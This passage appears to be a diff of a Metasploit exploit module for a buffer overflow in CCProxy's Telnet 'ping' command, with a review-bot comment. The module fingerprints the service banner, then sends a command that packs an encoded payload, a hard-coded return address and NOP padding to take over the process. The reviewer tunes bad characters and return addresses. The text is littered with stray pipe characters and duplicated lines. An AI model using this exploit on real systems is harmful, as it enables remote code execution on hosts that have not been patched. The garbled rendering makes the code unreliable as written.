'Ret' => 0x71aa1b22, # call esi ws2help.dll
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 11 2004'))
|
||||
|
||||
register_options(
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(23),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check
|
||||
def check
|
||||
connect
|
||||
banner = sock.get_once(-1,3)
|
||||
disconnect
|
||||
|
||||
if (banner =~ /CCProxy Telnet Service Ready/)
|
||||
return Exploit::CheckCode::Appears
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
||||
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
|
||||
sock.put(sploit + "\r\n")
|
||||
|
||||
|
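Review bot: `[ 'BID', '11666 ' ]` carries a trailing space inside the string in both the old and new reference lists, and it will be embedded verbatim when the framework builds the SecurityFocus URL; trim it to `'11666'`. The `'BadChars'` addition of `\x20` is the right call for a payload that travels inside the `ping` argument, and none of the five literal `Ret` values (0x75023411, 0x74fd2b81, 0x74fa2b22, 0x71aa1a97, 0x71aa1b22) contain a listed byte, which is worth a one-line comment next to the targets. Finally, `def initialize`, `def check` and the `DefaultOptions` block appear to change only in whitespace; re-indenting in a separate commit would keep the functional changes readable.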
@ -113,6 +85,3 @@ class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
# milw0rm.com [2007-09-03]
|
||||